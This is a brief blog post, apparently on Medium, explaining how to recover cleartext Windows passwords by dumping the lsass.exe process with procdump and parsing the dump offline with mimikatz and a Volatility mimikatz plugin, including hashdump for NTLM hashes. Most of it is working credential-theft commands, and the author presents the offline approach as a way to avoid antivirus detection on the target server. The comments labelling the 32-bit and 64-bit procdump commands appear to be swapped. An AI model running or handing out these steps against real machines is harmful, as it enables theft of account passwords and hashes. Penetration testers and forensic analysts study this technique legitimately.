using Mimikatz to get cleartext password from offline memory dump

AliBawazeEer
2 min readApr 11, 2018

--

requirements :
new version of kali
mimikatz : wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py

in case you found offline dump or you were able to dump lsas process using procdump

The technique can be involves in pentesting by obtaining passwords in clear text from a server without running “malicious” code in it since mimikatz is flagged by most AV . In this way we avoid having to deal with antivirus evasion techniques and other headaches.

On the other hand, Procdump is a tool developed by Mark Russinovich that will allow us to dump the memory space of a process to a file.

Note : To take dump you require system privileges

C:\temp\procdump.exe -accepteula  -ma lsass.exe lsass.dmp
#For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
#For 64 bits

Download the file lsass.dmp generated.
Launch mimikatz alpha against the lsass.dmp file with the commands:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

in case of full memory dump you can follow the reference : which i did not try myself but should work in virtualbox : http://wiki.yobi.be/wiki/RAM_analysis#RAM_dump_with_VirtualBox:_via_pgmphystofile

— — — — — — -

now lets dig into volatility and mimikatz

by default volatility does not have mimikatz so you need to navigate to the directory

  1. /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz

this is the memory dump file

if you need the ntlm hash :

volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump

That’s it , i did learn something new .. hope you do

--

--